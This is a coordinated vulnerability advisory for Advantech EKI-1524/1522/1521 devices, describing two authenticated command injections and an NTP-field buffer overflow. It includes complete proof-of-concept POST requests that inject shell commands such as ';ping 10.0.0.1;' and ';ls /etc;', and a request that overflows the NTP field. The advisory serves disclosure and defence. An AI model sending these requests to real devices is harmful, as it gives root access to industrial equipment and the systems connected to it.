Multiple Vulnerabilities in Advantech EKI-15XX Series

Advantech EKI-1524/1522/1521 devices are prone to authenticated command injections and a buffer overflow vulnerability. These vulnerabilities can be used to execute arbitrary commands on OS level.

Vendor description

„Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.“

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21
EKI-1522-CE series / 1.21
EKI-1521-CE series / 1.21

Vulnerability overview

1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)
The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors.

2) Buffer Overflow (CVE-2023-2575)
The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.

Proof of Concept

1) Authenticated Command Injection

The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background.

1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)

The following POST request executes the command “;ping 10.0.0.1” on the system:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

It is also possible to execute this command without any interceptor proxy by enclose it with „;“, which results in the string “;ping 10.0.0.1;”.

1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)

The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device’s web-interface. A POST request which injects the command “;ls /etc;” can be looks like the following:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

Such command can also be injected by setting the device name to “;ls /etc;”.

2) Buffer Overflow (CVE-2023-2575)

The following POST request can be used to trigger a buffer overflow vulnerability in the web server:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 823
Origin: http://172.16.0.97
Connection: close
Referer: http://172.16.0.97/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaa […] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa […]
&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

The serial port of the device provides error messages, which already indicate that the stack has been corrupted:

/ # *** Error in `./index.cgi‘: free(): invalid next size (normal): 0x00069828 ***
*** Error in `./index.cgi‘: malloc(): memory corruption: 0x00069898 ***

Furthermore, the forked child processes seem to remain in the process list as zombies – three buffer overflows were triggered in this case:

/ # ps
PID USER COMMAND
[…]
935 root ./index.cgi func=setsys
959 root ./index.cgi func=setsys
983 root ./index.cgi func=setsys
[…]

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update the product to the latest available firmware version.

Workaround

None

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.

References

Contact Timeline

2023-03-08: Contacting Advantech via Service Request form; No answer.
2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendor responded that EKI-1524/1522/1521 series are affected.
2023-03-20: Asked for status update.
2023-03-21: Vendor responded that the firwmare is currently under testing.
2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor.
2023-04-01: Vendor asked multiple question.
2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10.
2023-04-10: Clarified further issues.
2023-04-23: Vendor sent notification that a beta release of the firmware is available.
2023-05-02: Vendor sent notification that a new firwmare release is online.
2023-05-04: Asked vendor if the advisory can be published earlier than agreed.
2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed.
2023-05-11: Coordinated release of security advisory.

Author(s)

Thomas Weber

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.